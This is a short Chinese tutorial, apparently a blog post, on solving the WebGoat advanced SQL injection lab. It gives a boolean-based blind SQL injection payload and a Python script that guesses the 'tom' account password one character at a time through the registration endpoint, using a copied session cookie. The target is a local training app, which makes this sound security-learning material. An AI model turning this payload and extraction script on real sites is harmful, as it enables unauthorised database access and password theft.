利用python代码进行WebGoat密码爆破
WebGoat /SQL Injection(advaced)-5
在register页面:
用户名输入:tom' and substr(password,1,1)='a'--
其他字段任意输入
substr函数取password字符串的某个字母,在BP中抓包,复制JSESSIONID ---------------------------------------------------------------------------------
安装依赖
pip install requests
具体代码如下:
import requests
url = "http://127.0.0.1:8080/WebGoat/SqlInjectionAdvanced/challenge"
#修改JSESSIONID为复制的ID
headers={ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36","Cookie": "JSESSIONID=NKNYPCSvpweUmfw3quP1ASFH8tNPQFKTPea_Ro28",}
keylist = [chr(i) for i in range(33, 127)] #包括数字、大小写字母、特殊字符
answer = ''
for i in range(1,24):
for c in keylist:
payload = "tom' and substring(password,"+str(i)+",1)='"+c+"'-- ss" #用substring逐位猜测密码
formdata = {
"username_reg":payload,
"email_reg":"123@123.com",
"password_reg":"12",
"confirm_password_reg":"12",
}
response = requests.put(url, data = formdata, headers = headers)
if response.text.find("already exists") != -1: #猜对了的话返回结果会包含already exists
answer = answer+c
print(answer)
break
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
